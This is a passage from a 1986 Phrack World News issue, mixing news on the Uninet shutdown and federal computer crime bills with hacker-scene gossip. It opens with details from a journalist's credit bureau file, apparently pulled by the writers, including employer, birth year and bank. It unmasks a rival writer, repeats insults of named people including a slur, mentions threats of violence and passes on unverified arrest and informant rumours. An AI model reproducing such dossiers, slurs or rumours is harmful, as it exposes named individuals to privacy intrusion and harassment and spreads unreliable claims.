Staff Programmer at Carnegie Mellon University, a technical school in Pittsburgh, Pennsylvania. It also shows that he was born in 1959 and although it would appear that he is 27, Daniel claims to be 26. TRW lists his only bank account as being at the Pittsburgh National Bank. What this would mean is that Zigmond has never owned a car, never rented a car, never owned or rented a house, never had a credit card, never made any major transactions, and has only one bank account. During teleconferences on July 15th and 16th, several members of the PhoneLine Phantoms and myself questioned Zigmond about his TRW account and several other things. Zigmond claims to know nothing about why his account is like this and up till we brought up the fact that he worked at CMU, he had been telling people that he was a reporter only. As far as his reasons for needing codes, passwords, etc... He says its so his boss (whomever it will be) will believe the story. Why shouldn't he believe it? Haven't there been enough articles on hackers and phreakers in the past? Its been in the news very often and I'm sure that everyone remembers the Richard Sandza articles, "Night of The Hackers" and "Revenge of The Hackers" from Newsweek Magazine. Most recently Daniel Zigmond has been speaking with several members of the Neon Knights and he has obtained an account on the BBS World's Grave Elite, which is sysoped by Sir Gamelord, the Vice-President of the P.H.I.R.M. All hackers and phreaks are welcome to call him to be interviewed, although I advise against it. Please do not call up to rag on him because it is pointless. One example happened during the 2nd conference when someone called on Danny's other line. They said "did we wake you up?" Danny said "no" and then they hung up. Information Provided By Daniel Zigmond _______________________________________________________________________________ TeleComputist; Subscribe Now! July 25, 1986 ----------------------------- From: Forest Ranger and TeleComputist staff, To: You! TeleComputist has had a very positive response up to this time and we have received many requests for the free sample issue and now it is time to subscribe. For the sample free issue please self addressed stamped envelope with 39 cents postage to: TeleComputist Newsletter P.O. Box 2003 Florissant, Mo. 63032 Also, please send subscriptions to the same address. The subscription fee for the newsletter will be twelve dollars a year, fifty cents for back issues. This is a monthly circulation and we encourage letters. Information Provided by Telecomputist Staff Telecomputist Newsletter/BBS (314)921-7938 [KL's notes: Both Taran King and I have seen the first issue and it is damn good. This is NOT a scam, we know the TeleComputist Staff personally and they will NOT rip you off. The newsletter itself is of fine quality both in its print and content. The sample issue was merely a shadow of the upcoming issues and it will continue to get better as time goes on. It is definitely worth the twelve dollars for the year subscription.] _______________________________________________________________________________ ============== Page 8/8 ============== ==Phrack Inc.== Volume One, Issue 7, Phile 9 of 10 PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN *^=-> Phrack World News <-=^* PWN PWN PWN PWN Issue VI/Part 2 PWN PWN PWN PWN Compiled and Written by PWN PWN PWN PWN Knight Lightning PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN U.S. Telecom Retiring Uninet May 26, 1986 ---------------------------- "Uninet is coming down" Reston, Va. - U.S. Telecom Data Communications Company, Uninet Packet Switching Network will be retired as a result of the proposed merger of the company with GTE Telenet Communications Corporation. The move came to light last week as a joint transition study team completed a plan detailing how the two companies will be merged. The merger is a result of a joint venture spawned by the two companies parents, GTE Corporation and United Talecommunications Inc. The packet switches and related equipment which make up Uninet will be sold where possible, but a good deal of the equipment is likely to be discarded, a spokesman for the joint venture said. Under the plan, the capacity of GTE Telenet Packet Switching Network will be increased to handle additional traffic resulting from transference of U.S. Telecom customers to Telenet, according to the spokesman. The study groups considered integrating Uninet and Telenet because the external interfaces of each network are compatible but the internal protocols each network uses for functions such as networks management are substantially different and any attempt toward integration would require a massive development effort, spokesman said. Moving Uninet's traffic to Telenet is far cheaper. Telenet currently supports six times as much traffic as Uninet, which means Telenet's capacity must only be incremented by one sixth. Uninet will be phased out over a 120 day transition period, to begin when the joint venture is approved. The merger plan calls for all personnel of U.S. Telecom and GTE Telenet to be offered jobs with U.S. Sprint (now called U.S. Sprint, not Sprint/U.S. Telecom company since recent merger). The new company is headquartered in Reston, Virginia where GTE Telenet is currently headquartered. Submitted by Scan Man to Phrack Inc. From Communications Week, May 26 Issue _______________________________________________________________________________ P-80 Newsfile ------------- Computer Crime Bill Amended May 14, 1986 ---------------------------- After three years of Congressional hearings, the U.S. House of Representatives is finally getting ready to act on a computer crime bill, but like everything else in Congress many different people have input, and the focus and scope of pending computer crime bills have changed in important ways during the past few months. When bills are altered significantly, they are often written as "clean bills" and given new numbers. Computer crime measures are changing so fast it is difficult to keep track of them. What started out as The Counterfeit Access Device and Computer Fraud Act (HR 1001) became late last month The Computer Fraud and Abuse Act (HR 4562) which, although it has retained the same title, is now dubbed HR 4718 following the addition of some minor amendments. The new bill, sponsored by Rep. William Hughes (D-N.J.), is very similar to the old one, however, and would impose severe penalties for illegally accessing government and financial computers and crack down on illegal computer bulletin board systems. For more information on HR 4718, check the menu for bills in the US House of Representatives in the Legislation Database. Information Provided by Cathryn Conroy ------------------------------------------------------------------------------- House Committee Approves New Computer Crime Bill May 14, 1986 ------------------------------------------------ The House Judiciary Committee has approved and sent to the full House a new computer crime bill that would impose severe penalties for illegally accessing government and financial computers and crack down on illegal computer bulletin board systems. The bill (HR 4718), sponsored by Rep. William Hughes (D-N.J.), was passed by voice vote with no objection. It is aimed at closing loopholes in existing law and at helping to eliminate the "national malaise" of computer crime, Hughes said. The bill "will enable us to much more effectively deal with the emerging computer criminal in our society," said Hughes, who chairs the House crime subcommittee. Rep. Bill McCollum (R-Fla.), the ranking Republican on the crime subcommittee, added his support for the bill. He said it is time the nation began cracking down on computer criminals. "We demand privacy, yet we glorify those that break into computers," McCollum said, citing films and television shows that have painted a sympathetic portrait of computer criminals. The committee agreed to a single amendment to the bill -- one that would extend the list of computer systems protected by the measure to include those run by the brokers and dealers regulated by the Securities and Exchange Commission. McCollum, who sponsored the amendment, said the brokers and dealers provide some of the same services as banks and should receive equal protection against computer trespassers. The bill was reported out unanimously from the crime subcommittee. Hughes said an identical companion measure is moving through the Senate and that he expects the bill will become law before the end of the 99th Congress in December. Hughes and McCollum agreed that the bill will help eliminate another glaring example of the failure of existing federal law to keep pace with technological advances. "For the most part," he said, "our laws are rooted in the concept of property crimes, where someone trespasses into or steals another person's property. "With computer crimes, the trespassing or theft is done electronically, not physically," he added. "Although the losses are often just as great or even greater than property crime, our laws are not current enough to keep pace with the changing technology used by the criminals." Hughes was the author of the nation's first computer crime law in 1984. That bill established a new federal crime for unauthorized access to classified information in government computers and a misdemeanor for accessing any federal computer or computer containing financial or credit information. The new measure would establish a: -:- New felony for trespassing into federal interest computers, those run by or for the federal government, banks or states. Offenders would face five-year prison terms. -:- Second felony for "maliciously trespassing" into a federal interest computer and causing more than $1,000 in damage. -:- New category of federal misdemeanors involving the use of illegal BBSes to post private information, such as credit card data, phone account information and passwords. "We need to establish clear guidelines for protecting the information stored in computers and for cracking down on those who knowingly put computers to criminal of malicious use," Hughes said. Information Provided by J. S. Orr ------------------------------------------------------------------------------- Access To Government Computers Clarified June 9, 1986 ---------------------------------------- Sen. Charles McC. Mathias (R- Md.) has introduced a bill in the U.S. Senate that would amend Section 1030 of Title 18 of the United States Code with the purpose of clarifying coverage with respect to access to computers operated for or on behalf of the federal government. The legislation would clearly impose penalties on anyone who modified, destroyed or prevented use of information in a government computer system or who used or disclosed individually identifiable information in such a computer. The bill has been referred to the Senate Committee on The Judiciary. No subcommittee has yet been assigned. Information Provided by Cathryn Conroy _______________________________________________________________________________ Tap Interviews II...by Dead Lord July 14, 1986 -------------------------------- The infamous Dead Lord is back and this time with an anonymous rag file that he entitled Tap Interviews II to start people thinking that the Infiltrator had written it. Lets look at this file in parts. First Dead Lord starts out by saying that he is Infiltrator and then changes his mind and becomes Sharp Razor (who is supposedly in prison). His first interview was an imaginary exchange of words between him and Lex Luthor of the Legion Of Doom. The interview also was used to rag on Infiltrator by the way it was presented. Dead Lord then decided to interview Executive Hacker of Chief Executive Officers (CEO). The funny part about this interview is that Executive Hacker is another handle used by Dead Lord. The only rag mentioned was that Executive Hacker didn't know that Ultima IV had been released and that there were only two members in CEO. Dead Lord then goes on to say, "LOD is a group of egotistical fools..." Then started the straight rags without the interview crap. This is where ole Dead Lord gives his opinion on eFerything. For the first few paragraphs he rags on The Doctor, SpecElite, pirates in general, Monty Python, and The Flying Circus BBS. Then he starts giving descriptions of the people who attend the weekly TAP meetings: "Cheshire is a tired old man, Broadway Hacker, who is an obnoxious slob anyway, stopped going, the "950 codes kids" Ninja NYC and his pals have mostly moved on, though Ninja NYC still attends. Ninja NYC is, at 17 years old, a complete criminal, the guy has stolen everything you can think of..." "Two Sigmund Frauds also attend (they are partners) one is a skinny asshole who has an earing and the other I never spoke to, but he is he one who supposedly does all the BBS calling. There is also some friend of Ninja's who works for Northern Telcom." "There is some young guy with a French accent who always smiles, and some middle aged fag who is always talking. Then there is MARK! Ye Mark, though he tries to be friendly, people try to stay away. He works at a Camera..." "He is slightly (very) unbalanced mentally, and always very confused. He is teased constantly but tolerated." "There are also a few less important people, such as "Sid" some greasy kid who is proud to have had a $1700+ fone bill because he thought he was using a diverter. Right now, they are generally a motley bunch. Also they get kicked out of restaurants frequently now, and are down to meeting at Burger King. How pitiful..." After all of the above bullshit, he talks about Lord Digital, his "cult," and his adventures with Paul Muad'Dib. Dead Lord still had more to say though, he decided to bring up Monty Python again as well as Phrack, TWCB, Stronghold East, Private Sector, and 2600 Magazine. All of what he had to say was completely bogus and Dead Lord claimed to be a member of Metal Shop Private, although he called it Metal Shop Elite, which is untrue. Fact is he was never a member, not even on the old MSP. He also claims that he has submitted articles for Phrack, but was turned down because they were original files. Best bet is that whatever he was writing, he didn't know what he was talking about. Some notes to Dead Lord, as far as why Taran King was in the hospital; First off it was a psychiatric ward not a "hospital". Second, why don't you go and read PWN 5-1 for the real story of what happened. Third, the cosysop of Stronghold East is not the Slayer, it is Slave Driver. The truth is that both MSP and SE refused to let Dead Lord on and he holds a grudge. He then went on to say that both 2600 Magazine and Private Sector sucked and that they always have. Of course I am sure that Dead Lord could easily put out a better magazine then either/or 2600 and Phrack Inc., and he of course has shown that he can run a better BBS than Private Sector or Metal Shop Private. He ragged on several other bulletin boards such as Inner View and Speed Demon Elite. After all of that he comes back to the subject of Legion of Doom, starts on Tribunal of Knowledge, and the says why Chief Executive Officers is better. "LOD's main claim to fame is that Lex Luthor types up shitloads of manuals and plasters LOD all over them. Getting published in 2600 every other month probably helps also." "Another emerging group CEO, isn't as ridiculous as LOD, I mean the members [all two of them] know a lot, and write intelligent stuff..." "Executive Hacker and Corporate Criminal, not much of a group even if these 2 do stack up better than the entire LOD." His last rags were on Adventurer's Tavern and Disk Rigger. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Most of you by now are probably wondering how we tracked him down. Well for starters Dead Lord made it a lot easier on us by deciding to mention that he lived in NYC. He also talked a lot about others in the NYC area. Dead Lord is a member of Draco Tavern. Dead Lord was refused access to Metal Shop Private and Stronghold East. Dead Lord's file was refused for Phrack Inc. The clincher however was in finding that Dead Lord was actually Executive Hacker, and I'm sure that many of you noticed that CEO, the group the Executive Hacker belongs to, was highlighted and not ragged on. Some other interesting things about Dead Lord include that fact that he started a rumor in New York City, that Taran King had appeared on a talk show dealing with hackers and the he is responsible for giving out Sigmund Fraud's and Ninja NYC's numbers to Daniel Zigmond and he probably has given him other numbers as well. It has been said that Dead Lord's phone number has been disconnected by outside sources several times in the past and that the entire TAP Meeting attendees group is out to cause him major physical damage. _______________________________________________________________________________ Quicknotes ---------- MOB RULES was indited on five counts of wire fraud by the secret service, the charges dated back to 1984. This is supposedly part of the reason that the Marauder took down Twilight Zone, but this is pure rumor. ------------------------------------------------------------------------------- More talk about Broadway Hacker being a REAL fed or fed informant has sprung up. We at PWN are looking for factual evidence that this is true. ------------------------------------------------------------------------------- Night Stalker, sysop of the Underground, was busted for something dealing with Transference of Funds. It is unknown as to if Dan Pasquale had anything to do with this bust. Credit Card numbers were frequently found here as well. His phone line is being tapped and he cannot really discuss his bust to much. He is also under constant surveillance wherever he goes. Look for a full story in Phrack World News VII. ------------------------------------------------------------------------------- The rumor that Carrier Culprit was busted is untrue, but he did receive a call from AT&T Security, regarding Alliance Teleconferencing Services. _______________________________________________________________________________